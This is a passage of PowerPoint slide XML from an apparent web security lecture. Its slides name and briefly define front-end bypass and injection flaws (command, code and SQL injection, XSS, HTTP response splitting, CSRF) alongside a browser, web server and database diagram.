            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Front-end bypass</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Interact with backend systems directly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Querying a web service directly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Accessing systems without authenticating to a single-sign-on system first</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dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Injection Flaws</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4100" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1612265"/>
            <a:ext cx="4800600" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Injecting code into some form of user input, with the goal of an interpreter somewhere processing it</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Some examples are:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Command Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Targets the operating system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Code Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Targets the application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Targets the backend data store</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="700" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Cross Site Scripting (XSS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Targets the clients of an application</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>HTTP Response Splitting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Enhances other attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Cross Site Request Forgery (CSRF)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Targets the trust an application has in</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> the user</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4101" name="AutoShape 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="invGray">
          <a:xfrm>
            <a:off x="6642100" y="3352800"/>
            <a:ext cx="1600200" cy="1219200"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4102" name="Line 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7404100" y="4572000"/>
            <a:ext cx="0" cy="1143000"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="3810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4103" name="AutoShape 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="7023100" y="1981200"/>
            <a:ext cx="762000" cy="838200"/>
          </a:xfrm>
          <a:prstGeom prst="can">
            <a:avLst>
              <a:gd name="adj" fmla="val 27500"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="66FF33"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>DB</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4104" name="Line 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="7404100" y="2819400"/>
            <a:ext cx="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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4105" name="AutoShape 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="6946900" y="5715000"/>
            <a:ext cx="990600" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFCC00"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4106" name="Freeform 39"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5389563" y="3335338"/>
            <a:ext cx="2476500" cy="1465262"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 1560"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 923"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 1560"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 923"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 1560"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 923"/>
              <a:gd name="T6" fmla="*/ 0 60000 65536"/>
              <a:gd name="T7" fmla="*/ 0 60000 65536"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 w 1560"/>
              <a:gd name="T10" fmla="*/ 0 h 923"/>
              <a:gd name="T11" fmla="*/ 1560 w 1560"/>
              <a:gd name="T12" fmla="*/ 923 h 923"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T6">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T7">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T8">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T9" t="T10" r="T11" b="T12"/>
            <a:pathLst>
              <a:path w="1560" h="923">
                <a:moveTo>
                  <a:pt x="0" y="923"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="217" y="785"/>
                  <a:pt x="1046" y="186"/>
                  <a:pt x="1303" y="93"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1560" y="0"/>
                  <a:pt x="1495" y="306"/>
                  <a:pt x="1545" y="362"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4107" name="Text Box 40"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7931150" y="2698750"/>
            <a:ext cx="109378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400" b="1" dirty="0"/>
              <a:t>Command</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4108" name="Freeform 41"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5368925" y="2590800"/>
            <a:ext cx="1806575" cy="2090738"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 1138"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 1317"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 1138"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 1317"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 1138"/>
              <a:gd name="T5" fmla="*/ 0 h 1317"/>
              <a:gd name="T6" fmla="*/ 0 60000 65536"/>
              <a:gd name="T7" fmla="*/ 0 60000 65536"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 w 1138"/>
              <a:gd name="T10" fmla="*/ 0 h 1317"/>
              <a:gd name="T11" fmla="*/ 1138 w 1138"/>
              <a:gd name="T12" fmla="*/ 1317 h 1317"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T6">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T7">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T8">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T9" t="T10" r="T11" b="T12"/>
            <a:pathLst>
              <a:path w="1138" h="1317">
                <a:moveTo>
                  <a:pt x="0" y="1317"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="155" y="1187"/>
                  <a:pt x="742" y="768"/>
                  <a:pt x="932" y="549"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1122" y="330"/>
                  <a:pt x="1095" y="114"/>
                  <a:pt x="1138" y="0"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4109" name="Text Box 42"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5962650" y="2667000"/>
            <a:ext cx="1008063"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400" b="1" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4110" name="Freeform 43"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5346700" y="4029075"/>
            <a:ext cx="1836738" cy="1762125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 1157"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 1110"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 1157"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 1110"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 1157"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 1110"/>
              <a:gd name="T6" fmla="*/ 0 60000 65536"/>
              <a:gd name="T7" fmla="*/ 0 60000 65536"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 w 1157"/>
              <a:gd name="T10" fmla="*/ 0 h 1110"/>
              <a:gd name="T11" fmla="*/ 1157 w 1157"/>
              <a:gd name="T12" fmla="*/ 1110 h 1110"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T6">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T7">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T8">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T9" t="T10" r="T11" b="T12"/>
            <a:pathLst>
              <a:path w="1157" h="1110">
                <a:moveTo>
                  <a:pt x="0" y="582"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="162" y="500"/>
                  <a:pt x="791" y="0"/>
                  <a:pt x="974" y="88"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1157" y="176"/>
                  <a:pt x="1072" y="897"/>
                  <a:pt x="1097" y="1110"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4111" name="Text Box 44"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6040438" y="4622800"/>
            <a:ext cx="1395412" cy="1198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400" b="1" dirty="0"/>
              <a:t>CSRF,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>XSS, and HTTP Response Splitting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4112" name="Line 46"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="7785100" y="3033713"/>
            <a:ext cx="215900" cy="471487"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="1270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a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4113" name="Group 86"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4648200" y="4038600"/>
            <a:ext cx="892175" cy="1309688"/>
            <a:chOff x="228" y="851"/>
            <a:chExt cx="334" cy="490"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:graphicFrame>
          <p:nvGraphicFramePr>
            <p:cNvPr id="4098" name="Object 20"/>
            <p:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </p:cNvGraphicFramePr>
            <p:nvPr/>
          </p:nvGraphicFramePr>
          <p:xfrm>
            <a:off x="228" y="1003"/>
            <a:ext cx="324" cy="338"/>
          </p:xfrm>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
              <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                  <p:oleObj spid="_x0000_s277594" name="Clip" r:id="rId4" imgW="2501798" imgH="2616098" progId="">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Clip" r:id="rId4" imgW="2501798" imgH="2616098" progId="">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 y="1003"/>
                          <a:ext cx="324" cy="338"/>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4114" name="Rectangle 88"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="327" y="1041"/>
              <a:ext cx="121" cy="91"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF0043"/>
            </a:solidFill>
            <a:ln w="12700">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd type="none" w="sm" len="sm"/>
              <a:tailEnd type="none" w="sm" len="sm"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPct val="95000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="30000"/>
                </a:spcBef>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0043"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="4115" name="Group 89"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="228" y="851"/>
              <a:ext cx="334" cy="214"/>
              <a:chOff x="288" y="2254"/>
              <a:chExt cx="528" cy="338"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="4116" name="Freeform 90"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="288" y="2254"/>
                <a:ext cx="528" cy="338"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1616"/>
                  <a:gd name="T1" fmla="*/ 0 h 1034"/>
                  <a:gd name="T2" fmla="*/ 0 w 1616"/>
                  <a:gd name="T3" fmla="*/ 0 h 1034"/>
                  <a:gd name="T4" fmla="*/ 0 w 1616"/>
                  <a:gd name="T5" fmla="*/ 0 h 1034"/>
                  <a:gd name="T6" fmla="*/ 0 w 1616"/>
                  <a:gd name="T7" fmla="*/ 0 h 1034"/>
                  <a:gd name="T8" fmla="*/ 0 w 1616"/>
                  <a:gd name="T9" fmla="*/ 0 h 1034"/>
                  <a:gd name="T10" fmla="*/ 0 w 1616"/>
                  <a:gd name="T11" fmla="*/ 0 h 1034"/>
                  <a:gd name="T12" fmla="*/ 0 w 1616"/>
                  <a:gd name="T13" fmla="*/ 0 h 1034"/>
                  <a:gd name="T14" fmla="*/ 0 w 1616"/>
                  <a:gd name="T15" fmla="*/ 0 h 1034"/>
                  <a:gd name="T16" fmla="*/ 0 w 1616"/>
                  <a:gd name="T17" fmla="*/ 0 h 1034"/>
                  <a:gd name="T18" fmla="*/ 0 w 1616"/>
                  <a:gd name="T19" fmla="*/ 0 h 1034"/>
                  <a:gd name="T20" fmla="*/ 0 w 1616"/>
                  <a:gd name="T21" fmla="*/ 0 h 1034"/>
                  <a:gd name="T22" fmla="*/ 0 w 1616"/>
                  <a:gd name="T23" fmla="*/ 0 h 1034"/>
                  <a:gd name="T24" fmla="*/ 0 w 1616"/>
                  <a:gd name="T25" fmla="*/ 0 h 1034"/>
                  <a:gd name="T26" fmla="*/ 0 w 1616"/>
                  <a:gd name="T27" fmla="*/ 0 h 1034"/>
                  <a:gd name="T28" fmla="*/ 0 w 1616"/>
                  <a:gd name="T29" fmla="*/ 0 h 1034"/>
                  <a:gd name="T30" fmla="*/ 0 w 1616"/>
                  <a:gd name="T31" fmla="*/ 0 h 1034"/>
                  <a:gd name="T32" fmla="*/ 0 w 1616"/>
                  <a:gd name="T33" fmla="*/ 0 h 1034"/>
                  <a:gd name="T34" fmla="*/ 0 w 1616"/>
                  <a:gd name="T35" fmla="*/ 0 h 1034"/>
                  <a:gd name="T36" fmla="*/ 0 w 1616"/>
                  <a:gd name="T37" fmla="*/ 0 h 1034"/>
                  <a:gd name="T38" fmla="*/ 0 w 1616"/>
                  <a:gd name="T39" fmla="*/ 0 h 1034"/>
                  <a:gd name="T40" fmla="*/ 0 w 1616"/>
                  <a:gd name="T41" fmla="*/ 0 h 1034"/>
                  <a:gd name="T42" fmla="*/ 0 w 1616"/>
